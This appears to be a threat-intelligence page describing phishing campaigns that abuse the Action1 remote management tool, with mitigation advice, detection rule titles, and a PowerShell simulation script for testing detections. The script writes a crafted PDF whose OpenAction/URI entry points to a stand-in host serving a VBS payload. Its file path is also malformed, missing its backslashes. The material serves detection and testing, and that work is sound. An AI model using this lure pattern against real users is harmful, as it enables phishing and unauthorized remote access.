SOC Prime Bias: High

06 Oct 2026 14:36 UTC

RMM Tool Abuse Continues to Grow Across Active Threat Campaigns

Author Photo
SOC Prime Team linkedin icon Follow
RMM Tool Abuse Continues to Grow Across Active Threat Campaigns
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Threat actors are abusing Remote Management and Monitoring (RMM) tools, particularly Action1, to establish persistent access within compromised environments. The attack starts with a phishing email carrying a malicious PDF that redirects victims to a VBS file. The script then downloads and installs an MSI package containing the legitimate Action1 agent, enabling unauthorized remote access.

Investigation

The investigation uncovered a malicious PDF that leverages OpenAction and URI keywords to initiate a download from a Vercel-hosted URL. Analysis of the retrieved MSI package revealed legitimate Action1 Corporation files being misused through the vendor’s own cloud infrastructure. The installed agent contains a specific CustomerID and communicates with a legitimate Action1 domain.

Mitigation

Organizations should configure email filtering to identify suspicious PDF structures containing OpenAction or URI keywords. Security teams should monitor for unauthorized RMM tool installations and creation of the A1Agent service. Blocking connections to unexpected RMM cloud infrastructure and identifying unusual or unauthorized CustomerIDs can further reduce the risk of remote access abuse.

Response

When malicious RMM activity is detected, isolate the affected host to prevent additional remote command execution. Investigate the originating phishing email and conduct forensic analysis of the associated VBS and MSI files. Revoke potentially compromised credentials and review Action1 agent configurations for indicators of unauthorized remote access or persistence.

Attack Flow

We are still updating this part.

Detections

LOLBAS WScript / CScript (via process_creation)

SOC Prime Team
06 Oct 2026

Alternative Remote Access / Management Software (via process_creation)

SOC Prime Team
06 Oct 2026

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)

SOC Prime Team
06 Oct 2026

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)

SOC Prime Team
06 Oct 2026

Possible Command and Control Activity by Remote Access Software Domain Communication Attempt (via dns)

SOC Prime Team
06 Oct 2026

IOCs (HashSha256) to detect: More RMM Tools In the Wild

SOC Prime AI Rules
06 Oct 2026

Remote Connection to Action1 Corporate Servers [Windows Network Connection]

SOC Prime AI Rules
06 Oct 2026

PDF OpenAction and URI Redirection to Malicious VBS [Windows File Event]

SOC Prime AI Rules
06 Oct 2026

Simulation Execution

  • Attack Narrative & Commands: The adversary is simulating a phishing campaign. The goal is to deliver a file named Transaction Receipt .pdf to a victim. The PDF is specially crafted so that as soon as the user opens it, the /OpenAction command triggers a /URI redirect. This redirect is designed to lead the user to a site that serves a malicious VBScript. To trigger the specific detection rule provided, we will create a file with the exact name and internal strings required.

  • Regression Test Script:

    # Simulation Script: Triggering the PDF OpenAction Detection
    $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf"
    
    # Crafting the "malicious" PDF content to match the detection keywords
    $pdfContent = @"
    %PDF-1.1
    1 0 obj
    << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >>
    endobj
    2 0 obj
    << /Type /Pages /Parent 1 0 R /Count 1 >>
    endobj
    trailer
    << /Root 1 0 R >>
    %%EOF
    "@
    
    # Writing the file to disk to trigger the 'file_event' detection
    $pdfContent | Out-File -FilePath $targetFile -Encoding ascii
    
    Write-Host "Simulation file created at: $targetFile"
    Write-Host "Check your SIEM for the detection alert."
  • Cleanup Commands:

    # Cleanup: Remove the simulated malicious file
    $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf"
    if (Test-Path $targetFile) {
        Remove-Item -Path $targetFile -Force
        Write-Host "Cleanup complete: $targetFile removed."
    } else {
        Write-Host "Cleanup: File not found."
    }